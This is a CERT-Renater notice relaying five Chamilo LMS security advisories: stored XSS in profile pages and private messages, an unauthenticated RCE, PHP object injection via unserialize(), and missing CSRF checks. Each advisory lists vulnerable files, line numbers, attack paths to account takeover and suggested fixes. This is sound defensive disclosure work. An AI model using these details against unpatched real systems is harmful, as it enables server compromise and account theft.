Ce mail provient de l'extérieur, restons vigilants ===================================================================== CERT-Renater Note d'Information No. 2026/VULN668 _____________________________________________________________________ DATE : 24/06/2026 HARDWARE PLATFORM(S): / OPERATING SYSTEM(S): Systems running Chamilo LMS versions prior to 2.0.1. ===================================================================== https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-9833-c7cj-x9xm https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-g4c3-4g96-6g4m https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-pr59-4rm7-ghwx https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-p2qq-wjp2-j334 https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-x88v-rg6r-vqq6 _____________________________________________________________________ Pre-auth stored XSS in public user-profile page (in 2.0.0) High ywarnier published GHSA-9833-c7cj-x9xm Jun 24, 2026 Package Chamilo LMS (PHP) Affected versions >= 2.0.0, < 2.0.1 Patched versions 2.0.1 Description Summary GET /user/{username} is anonymously reachable and renders six user-editable profile fields (firstname, lastname, competences, openarea, teach, diplomas) inside {% autoescape false %}. No server-side sanitiser on the write path. Any ROLE_STUDENT attacker plants HTML in their own profile → payload fires in any visitor's browser, including admins. Verified live on Chamilo 2.1.0 (commit b543d3a). Impact Attacker: ROLE_STUDENT (or anonymous if self-registration enabled). Victim: any visitor to /user/ incl. admins. Trigger: clicking the profile link (link-share / forum / staff onboarding). Result: account takeover via session / JWT / localStorage exfiltration. Suggested fix Remove {% autoescape false %} from profile.html.twig:4-13. Sanitise rich-text fields on write via a Doctrine PrePersist/PreUpdate listener using RichText::getSafeHtml(). Reject angle brackets in firstname/lastname on write. Consider gating /user/{username} behind #[IsGranted('ROLE_USER')]. Credit Reported by turingpoint - Jan Kahmen - jan@turingpoint.de Severity High 8.9/ 10 CVSS v3 base metrics Attack vector Network Attack complexity Low Privileges required Low User interaction Required Scope Changed Confidentiality High Integrity High Availability Low CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L CVE ID CVE-2026-45144 Weaknesses Weakness CWE-79 Credits @kah-ja kah-ja Reporter _____________________________________________________________________ Unauthenicated RCE v2.0.0 Critical ywarnier published GHSA-g4c3-4g96-6g4m Jun 9, 2026 Package Chamilo LMS (PHP) Affected versions 2.0.0 Patched versions 2.0.1 Description Impact Ability to run arbitrary code on the server without authentication. Severity Critical 9.8/ 10 CVSS v3 base metrics Attack vector Network Attack complexity Low Privileges required None User interaction None Scope Unchanged Confidentiality High Integrity High Availability High CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE ID CVE-2026-45140 Weaknesses Weakness CWE-22 Weakness CWE-94 Weakness CWE-219 Weakness CWE-434 Credits @h4knet h4knet Reporter _____________________________________________________________________ An insecure deserialization vulnerability in `career.lib.php` and `import_csv.php` allows an attacker who can influence database content to execute arbitrary code on the server via PHP Object Injection (POP chain). (=2.0.0) High ywarnier published GHSA-pr59-4rm7-ghwx Jun 24, 2026 Package Chamilo LMS (PHP) Affected versions 2.0.0 Patched versions 2.0.1 Description Two locations call PHP's native unserialize() on data retrieved from the database without the allowed_classes: false safety option: File: public/main/inc/lib/career.lib.php — Line 495 $userResult = unserialize($careerData['extra_data']); File: public/main/cron/import_csv.php — Line 2768 $userResult = unserialize($userCareerData['extra_data']); The extra_data column is populated from user_career records. If an attacker can write crafted serialized PHP objects into this column (e.g., via a secondary SQL injection, a compromised admin CSV import, or a lower-privilege admin panel), they can instantiate arbitrary PHP objects and trigger POP gadget chains present in Symfony, Doctrine, or Monolog — all of which are in the autoloader. The codebase already provides a safe wrapper at public/main/inc/lib/UnserializeApi.php which enforces an allowed-class whitelist. Line 475 of the same file (career.lib.php) correctly uses UnserializeApi::unserialize('career', $item['value']), proving the safe API is available but was not applied consistently. Impact Remote Code Execution (RCE). Any attacker who can write to the user_career.extra_data database column (via CSV import, SQL injection, or admin access) can execute arbitrary OS commands as the web server user. This compromises full server confidentiality, integrity, and availability. Severity High 7.5/ 10 CVSS v3 base metrics Attack vector Network Attack complexity High Privileges required Low User interaction None Scope Unchanged Confidentiality High Integrity High Availability High CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE ID CVE-2026-45145 Weaknesses No CWEs Credits @Vishal-07-R Vishal-07-R Reporter @liyander liyander Reporter _____________________________________________________________________ Missing CSRF Protection on Skill AJAX Endpoints (=2.0.0) High ywarnier published GHSA-p2qq-wjp2-j334 Jun 24, 2026 Package Chamilo LMS (PHP) Affected versions 2.0.0 Patched versions 2.0.1 Description Multiple destructive AJAX actions in the skill management module lack CSRF token validation, allowing an attacker to delete skills, profiles, and gradebook associations via cross-site request forgery. Details File: public/main/inc/ajax/skill.ajax.php The following actions perform destructive database operations without any Security::check_token() call: Action Line Operation add 26-36 Creates or edits skill records delete_gradebook_from_skill 334-351 Deletes skill-gradebook associations save_profile 361-384 Creates/modifies skill profiles delete_profile 386-397 Deletes skill profiles For contrast, survey.php (line 80) correctly uses Security::check_token('post') for its destructive group operations. Impact Cross-Site Request Forgery (CSRF). Any authenticated admin or DRH who visits a malicious page will unknowingly delete or modify skill records, profiles, and gradebook associations. Severity High 7.1/ 10 CVSS v3 base metrics Attack vector Network Attack complexity Low Privileges required None User interaction Required Scope Unchanged Confidentiality None Integrity High Availability Low CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L CVE ID CVE-2026-45141 Weaknesses No CWEs Credits @Vishal-07-R Vishal-07-R Reporter @liyander liyander Reporter _____________________________________________________________________ Student-to-admin stored XSS in private messages via v-html (<=2.0.0) Critical ywarnier published GHSA-x88v-rg6r-vqq6 Jun 9, 2026 Package chamilo/chamilo-lms (Composer) Affected versions >= 2.0.0, < 2.1.0 Patched versions 2.0.1 Description Summary Message.content is stored raw (no server-side sanitiser) and rendered in the Vue frontend via v-html="item.content" without sanitizeHtml(). Any authenticated user (incl. ROLE_STUDENT) can send a message directly addressed to a specific administrator (e.g. /api/users/1); when that admin opens their inbox, the payload fires in their session. This is a targeted student → admin attack — no phishing indirection, no link-click required, the admin's inbox is opened as a routine daily action. Verified live on Chamilo 2.1.0 (commit b543d3a). Impact Attacker: ROLE_STUDENT (lowest authenticated role). Victim: any receiver, incl. platform admin. MessageVoter::CREATE has no role check — any user may send to any user. Trigger: opening the inbox (routine, no phishing). Result: account takeover via session-cookie / JWT / localStorage exfiltration → student → super-admin. Vulnerable code src/CoreBundle/State/MessageProcessor.php — persists content via $this->persistProcessor->process(...) without sanitising. src/CoreBundle/Security/Authorization/Voter/MessageVoter.php:65-69 — any user may CREATE a message where they are the sender. assets/vue/views/message/MessageShow.vue:118:

Legacy Twig path public/main/template/default/message/view_message.html.twig:4,40 has the same issue inside {% autoescape false %}. Suggested fix Sanitise on write in MessageProcessor::process via RichText::getSafeHtml() (HTMLPurifier already wired). In MessageShow.vue:118 wrap with sanitizeHtml(item.content) — helper already used in TermsList.vue:34. Remove {% autoescape false %} from view_message.html.twig. Enable ESLint rule vue/no-v-html. Credit Reported by turingpoint - Jan Kahmen - jan@turingpoint.de Severity Critical 9.0/ 10 CVSS v3 base metrics Attack vector Network Attack complexity Low Privileges required Low User interaction Required Scope Changed Confidentiality High Integrity High Availability High CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H CVE ID CVE-2026-45143 Weaknesses Weakness CWE-79 Credits @kah-ja kah-ja Reporter ========================================================= + CERT-RENATER | tel : 01-53-94-20-44 + + 23/25 Rue Daviel | fax : 01-53-94-20-41 + + 75013 Paris | email:cert@support.renater.fr + =========================================================